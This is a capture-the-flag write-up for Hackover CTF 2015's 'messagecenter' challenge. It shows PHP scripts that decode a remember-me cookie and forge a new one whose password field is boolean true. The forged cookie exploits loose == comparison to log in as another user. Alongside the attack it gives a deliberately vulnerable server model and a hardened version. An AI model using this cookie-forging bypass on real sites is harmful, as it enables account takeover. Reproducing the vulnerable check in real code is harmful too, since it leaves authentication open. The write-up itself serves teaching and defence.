Hackover CTF 2015 – messagecenter

This writeup describes the solution for the messagecenter challenge in Hackover CTF 2015 held by Chaos Computer Club Hamburg.

[Screenshot: Hackover CTF 2015 - Messagecenter - Task description]

The task was … to find the flag … as usual :D. So let's look at the website.

[Screenshot: Hackover CTF 2015 - Messagecenter - Website]

So we get a simple website with login fields and some information (demo login data, further usernames, etc.). When logging in with the "demo" account and the "remember me" option we get this view:

[Screenshot: Hackover CTF 2015 - Messagecenter - Login view]

Nothing special – you can read and write messages. The website is vulnerable to Cross-Site Scripting, but since nobody except other contestants reads the messages, no session ID of admin, alice, bob or any other interesting account can be stolen that way. So this is not the way to the flag. Let's look at the cookie data instead.

[Screenshot: Hackover CTF 2015 - Messagecenter - Cookie data]

There is the PHP session ID (PHPSESSID) and a second cookie that only exists when the "remember me" checkbox was used at login. At first glance it looks like URL-encoded serialized data. Let's check this with a small PHP script.

<?php

  // The autologin cookie exactly as the browser sends it:
  // URL-encoded PHP serialization format.
  $cookie = "a%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22password%22%3Bs%3A40%3A%2289e495e7941cf9e40e6980d14a16bf023ccd4c91%22%3B%7D";

  // Undo the URL encoding, then let PHP parse its own serialization format.
  $data = unserialize(urldecode($cookie));
  var_dump($data);

?>

When executing…

ruport@zentaur:~/hackover2015$ php cookie.php 
array(2) {
  ["username"]=>
  string(4) "demo"
  ["password"]=>
  string(40) "89e495e7941cf9e40e6980d14a16bf023ccd4c91"
}

Alright, the username and the password hash (40 hex characters, the length of a SHA-1 digest) are stored directly in the autologin cookie. Let's think about what the server does with this data: it will most likely unserialize the cookie and check username and password against its database. As we all know, PHP comparison is not type-safe when the simple == is used instead of ===. In particular, a non-empty string loosely compared to the boolean true evaluates to true.

If the server uses the loose comparison, changing the type of the password from string to boolean true makes the check succeed for any username, because every stored hash is a non-empty string. Let's test this and write a small PHP script to prepare such a cookie.
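To make the reasoning concrete, here is an added example of what the server side presumably looks like. It is not the challenge's code (which was never published) but a model of it: a constructed user table, a vulnerable autologin check that unserializes the cookie and compares with ==, and a hardened variant next to it. The function names and the user table are my assumptions; only the demo hash is taken from the cookie above.

```php
<?php
// Added example, not the challenge's source code. Models the "remember me"
// handling that the boolean cookie abuses, and a hardened version of it.

// Constructed user table. The password column holds a 40-hex-char hash,
// like the value observed in the demo cookie (taken from the page above);
// Alice's hash is made up for this demo.
$users = [
    'demo'  => '89e495e7941cf9e40e6980d14a16bf023ccd4c91',
    'Alice' => sha1('some-unknown-password'),
];

// Vulnerable (assumed server logic): unserialize() attacker-controlled
// data, then compare the stored hash with the cookie value using ==.
function autologin_vulnerable(array $users, string $cookie): ?string {
    $data = unserialize(urldecode($cookie));
    if (!is_array($data) || !isset($data['username'], $data['password'])) {
        return null;
    }
    $name = $data['username'];
    if (!is_string($name) || !isset($users[$name])) {
        return null;
    }
    // Loose comparison: a non-empty string == true is true in PHP, so a
    // cookie whose password is serialized as b:1 matches every stored hash.
    if ($users[$name] == $data['password']) {
        return $name;
    }
    return null;
}

// Hardened: do not unserialize() untrusted input at all (use JSON), accept
// only strings for both fields, and compare hashes with hash_equals(),
// which is strict and constant-time.
function autologin_hardened(array $users, string $cookie): ?string {
    $data = json_decode(urldecode($cookie), true);
    if (!is_array($data)
        || !isset($data['username'], $data['password'])
        || !is_string($data['username'])
        || !is_string($data['password'])) {
        return null;
    }
    $name = $data['username'];
    if (!isset($users[$name])) {
        return null;
    }
    if (hash_equals($users[$name], $data['password'])) {
        return $name;
    }
    return null;
}

// The forged cookie from this writeup: password carried as boolean true.
$forged = urlencode(serialize(['username' => 'Alice', 'password' => true]));

var_dump(autologin_vulnerable($users, $forged));
var_dump(autologin_hardened($users, $forged));

// Same trick against the hardened version, but in its JSON cookie format.
$forgedJson = urlencode(json_encode(['username' => 'Alice', 'password' => true]));
var_dump(autologin_hardened($users, $forgedJson));
```

Running it, the vulnerable function logs the forged cookie in as Alice, while the hardened one rejects both forged cookies: the first because it is not JSON, the second because the password is not a string. Replacing == with === alone would already stop this particular trick, but unserialize() on a client-controlled cookie remains a bad idea regardless of the comparison, since it also exposes the application to object injection; storing credentials in a cookie at all is the real design mistake, a random remember-me token looked up server side is the usual fix.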

<?php

  // Same structure as the real cookie, but the password is a boolean
  // instead of the hash string, so that == compares true against the
  // stored hash.
  $data = array('username' => "Alice", 'password' => True);

  // Serialize in PHP's native format (b:1; for the boolean) and URL-encode
  // it so it can be pasted into the browser as the cookie value.
  $cookie = serialize($data);

  print urlencode($cookie);

?>

The output after execution is:

ruport@zentaur:~/hackover2015$ php messagecenter.php 
a%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%22Alice%22%3Bs%3A8%3A%22password%22%3Bb%3A1%3B%7D

After putting this new autologin cookie into the browser and refreshing the website we get a "very important" message in Alice's inbox:

[Screenshot: Hackover CTF 2015 - Messagecenter - Solution]

The solution is “hackover15{typeSafetyToTheRescue}“.
